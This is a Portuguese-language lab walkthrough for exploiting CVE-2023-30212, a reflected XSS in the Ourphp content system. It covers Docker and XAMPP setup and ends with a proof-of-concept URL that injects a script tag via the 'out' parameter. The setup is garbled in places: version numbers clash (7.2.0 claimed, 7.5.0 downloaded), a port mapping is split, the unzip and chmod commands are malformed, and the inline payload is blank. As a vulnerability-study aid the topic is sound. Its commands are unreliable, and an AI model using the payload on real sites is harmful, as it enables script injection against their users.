
Guia passo a passo de exploração para CVE-2023-30212, uma vulnerabilidade XSS no Ourphp 7.2.0, com configuração do Docker e demonstração de injeção de payload.
Explorando vulnerabilidade no Ourphp versão 7.2.0 também conhecida como CVE 2023 30212
Passo 1. Baixe e instale o Docker no seu sistema (Nota). Estou a usar o Docker porque é rápido e fácil de instalar o ubuntu.
Passo 2. Configurar o ambiente Docker
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash
Passo 3. Instalar servidor web, php & mysql. Vou instalar o servidor xampp para isso.
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start
Passo 4. Baixar Ourphp versão 7.2.0
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775
Passo 5. Configurar Ourphp no navegador Abra o seu navegador e digite localhost ou 127.0.0.1 Siga as instruções e instale o Ourphp.
Passo 6. Explorando a vulnerabilidade A versão 7.2.0 do Ourphp tem uma vulnerabilidade a XSS (Cross-Site Scripting). Para mitigar a vulnerabilidade no ficheiro /client/manage/ourphp_out.php que permite a execução de código XSS,
precisa modificar o código. A vulnerabilidade surge quando o parâmetro "ourphp_admin" é definido como "logout" e a variável controlável "out" é ecoada.
Os atacantes podem explorar isto injetando um payload como "".
Code: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>
